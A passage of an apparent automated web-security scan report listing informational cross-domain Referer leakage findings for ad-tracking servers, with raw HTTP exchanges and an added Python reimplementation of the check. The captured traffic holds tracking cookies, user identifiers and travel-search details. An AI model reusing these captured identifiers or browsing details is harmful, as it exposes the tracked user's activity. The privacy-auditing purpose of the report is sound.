document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20111002201509&cmxid=2101.020017861901058366xmc" style="display: none" height="1" width="1" border="0" />');var ord=Math.random()*10000000000000000;document.write("<img src='http://p.opt.fimserve.com/bht/?px=3140&v=1&rnd=" + ord + "' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://ad.xtendmedia.com/pixel?id=983035&t=2' width='1' height='1' />");document.write('<img src="http://ad.yieldmanager.com/pixel?id=979001&t=2" width="1" height="1"/>');var ord=Math.random()*10000000000000000;document.write("<img src='http://pixel.rubiconproject.com/tap.php?v=5467' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://tag.admeld.com/pixel?admeld_adprovider_id=5&_segment=93' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTEzODQmdGw9NDMyMDA' width='1' height='1' />");var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...

19.100. http://as.chango.com/links/adunit/1.31759988192e+12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...
</script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
<IMG SRC="http://ad.doubleclick.net/ad/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

19.101. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /bh/rtset?do=add&pid=531292&ev=OO-00000000000000000&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DOO-00000000000000000 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr

Response

HTTP/1.1 302 Moved Temporarily
Server: GlassFish v3
CW-Server: cw-app605
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr99f871d6edb7aea19dd0bf8; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:50:17 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|530739.99f871d6ab8391d98e386b3c.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|531292.OO-00000000000000000.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 01-Oct-2012 23:50:17 GMT; Path=/
Location: http://m.xp1.ru4.com/meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 239
Date: Sun, 02 Oct 2011 23:50:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=OO-00000000000000000">here</a>
...[SNIP]...

19.102. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /?pixid=99016880 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 03 Oct 2011 00:26:45 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...

19.103. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /?pixid=99013083 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=_52rCMf9pAIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 270
Date: Mon, 03 Oct 2011 00:10:30 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.googleadservices.com/pagead/conversion/1030885431/?label=_52rCMf9pAIQt6DI6wM&amp;amp;guid=ON&amp;amp;script=0">here</a>
...[SNIP]...

19.104. http://cdn.flashtalking.com/container/4649/4649.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.flashtalking.com
Path:   /container/4649/4649.js

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains.

Request

GET /container/4649/4649.js?SamleHomepage1&cachebuster=132287.43779473007 HTTP/1.1
Host: cdn.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 200 OK
x-amz-id-2: DWxYBZV6nCQWk1mmwgC2TE5BkqhTA4++brgXVv65iCjXzftjlkk4MOBRhuYCvMwT
x-amz-request-id: 24969F7CF586B88A
Last-Modified: Fri, 16 Sep 2011 16:20:52 GMT
ETag: "24e353f86a77738ea2c3a2c05a6a90ea"
Content-Type: text/javascript
Content-Length: 858
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:58:08 GMT
Connection: close

var ftR=Math.floor(Math.random()*100000);
var ftE=new Array("http://servedby.flashtalking.com/spot/217;4649;542/?Sample_Homepage_1");
for(var ftP=0;ftP<ftE.length;ftP++){
ftOP(ftE[f
...[SNIP]...
</div>');
document.write('<img src="http://www.wtp101.com/pixel?id=3105" width="1" height="1" border="0" style="display:none;"/>');
document.write('<img src="http://a.tribalfusion.com/i.cid?c=395973&ev=1&page=Samplehomepage" width="1" height="1" border="0" style = "display:none;">');
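As an added example, not code from the XSS.CX report or from the scanner that produced it, the Python below reproduces the check behind the entries in this section: it parses a raw request/response pair like the ones shown, and when the request target carries a query string and the response links to another site, it lists the query parameters that would travel in the Referer header of the follow-on requests together with the third-party hosts that would receive them. The sample messages are abbreviated copies of the cdn.flashtalking.com and cm.g.doubleclick.net exchanges, constructed inline for the example (the long redirectURL value is shortened). The two-label "registrable domain" rule used to decide what counts as cross-domain is an assumption of the example, not a public-suffix lookup.

```python
"""Added example: re-implementation of the 'cross-domain Referer leakage' check
behind the entries in this section. Not code from the XSS.CX report or from Burp."""
import re
from urllib.parse import urlsplit, parse_qsl

# Absolute http(s) URLs inside HTML or JavaScript; stops at quotes, whitespace and brackets.
URL_RE = re.compile(r"https?://[^\s\"'<>()\\]+")

# Constructed sample: an abbreviated copy of the cdn.flashtalking.com exchange above.
SAMPLE_REQUEST = (
    "GET /container/4649/4649.js?SamleHomepage1&cachebuster=132287.43779473007 HTTP/1.1\r\n"
    "Host: cdn.flashtalking.com\r\n"
    "Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/javascript\r\n"
    "\r\n"
    'var ftE=new Array("http://servedby.flashtalking.com/spot/217;4649;542/?Sample_Homepage_1");\n'
    'document.write(\'<img src="http://www.wtp101.com/pixel?id=3105" width="1" height="1"/>\');\n'
    'document.write(\'<img src="http://a.tribalfusion.com/i.cid?c=395973&ev=1&page=Samplehomepage" width="1" height="1">\');\n'
)

# Constructed sample: an abbreviated copy of a cm.g.doubleclick.net cookie-matching
# redirect from this section (the redirectURL value is shortened).
SAMPLE_REDIRECT_REQUEST = (
    "GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26t%3D2 HTTP/1.1\r\n"
    "Host: cm.g.doubleclick.net\r\n"
    "\r\n"
)
SAMPLE_REDIRECT_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26t%3D2\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    '<HTML><BODY>The document has moved <A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26t%3D2">here</A></BODY></HTML>\n'
)


def parse_http_message(raw):
    """Split a raw HTTP request or response into (start line, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def registrable_domain(host):
    """Crude 'same site' rule: the last two DNS labels. This is an assumption of
    the example, not a public-suffix lookup (it would merge everything under co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def cross_domain_links(host, resp_headers, resp_body):
    """Absolute URLs in the body, plus any Location header, whose site differs from host."""
    candidates = set(URL_RE.findall(resp_body))
    if "location" in resp_headers:
        candidates.add(resp_headers["location"])
    own = registrable_domain(host)
    return sorted(u for u in candidates
                  if registrable_domain(urlsplit(u).hostname or "") != own)


def referer_leakage(raw_request, raw_response):
    """Return None unless the request target has a query string AND the response
    links to another site; otherwise describe what the Referer header would carry."""
    request_line, req_headers, _ = parse_http_message(raw_request)
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    if not parts.query:
        return None
    _status, resp_headers, body = parse_http_message(raw_response)
    host = req_headers.get("host", "")
    links = cross_domain_links(host, resp_headers, body)
    if not links:
        return None
    return {
        "url": "http://%s%s?%s" % (host, parts.path, parts.query),
        "leaked_params": [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)],
        "third_party_hosts": sorted({urlsplit(u).hostname for u in links}),
        "links": links,
    }


if __name__ == "__main__":
    for req, resp in ((SAMPLE_REQUEST, SAMPLE_RESPONSE),
                      (SAMPLE_REDIRECT_REQUEST, SAMPLE_REDIRECT_RESPONSE)):
        finding = referer_leakage(req, resp)
        if finding:
            print(finding["url"])
            print("  query parameters exposed via Referer:", ", ".join(finding["leaked_params"]))
            print("  third-party hosts that would receive it:", ", ".join(finding["third_party_hosts"]))
```

The Location header is counted because the scanner counts it, but a practitioner triaging the 302 entries should keep one distinction in mind: a browser following a redirect keeps the Referer of the page that started the request rather than setting it to the redirecting URL, so for the cookie-matching pixels the data that actually reaches the next host is whatever the redirector copies into its Location (the redirectURL and id values above), not the redirector's own query string. Entries whose query strings carry session or search detail, such as the hotels.com and travelocity.com requests later in this section, are the ones where a same-site subresource response linking to third parties exposes that detail through Referer.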

19.105. http://clk.specificclick.net/click/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.specificclick.net
Path:   /click/v=5

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01 HTTP/1.1
Host: clk.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 211
Date: Mon, 03 Oct 2011 00:26:42 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01">here</a>.<p>
</body>
...[SNIP]...

19.106. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=105311;u13=114243;u14=203448;u15=1401516;u16=14%2F10%2F11-16%2F10%2F11;u18=2;ord=11678075?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:19 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 382
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2">here</A>
...[SNIP]...

19.107. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_gid=CAESENMwAp9y838qvs4mxLt4ILs&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:27:30 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 337
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&amp;google_gid=CAESENMwAp9y838qvs4mxLt4ILs&amp;google_cver=1">here</A>
...[SNIP]...

19.108. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?google_nid=pubmatic&google_cm&google_sc HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTIxNzcmdGw9MTI5NjAw&google_error=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:52:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 302
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTIxNzcmdGw9MTI5NjAw&amp;google_error=1">here</A>
...[SNIP]...

19.109. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423476%26id%3D1423478%26id%3D1423475%26id%3D1423477%26id%3D1423479%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=prope724;cat=prope480;u1=US;u2=Boston;u3=Boston%20Omni%20Parker%20House%20Hotel;u4=Merchant;u5=109368;u6=289.00;u11=4;u15=1401516;u16=04%2F10%2F11-07%2F10%2F11;ord=71228260?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423476%26id%3D1423478%26id%3D1423475%26id%3D1423477%26id%3D1423479%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:28:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 382
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
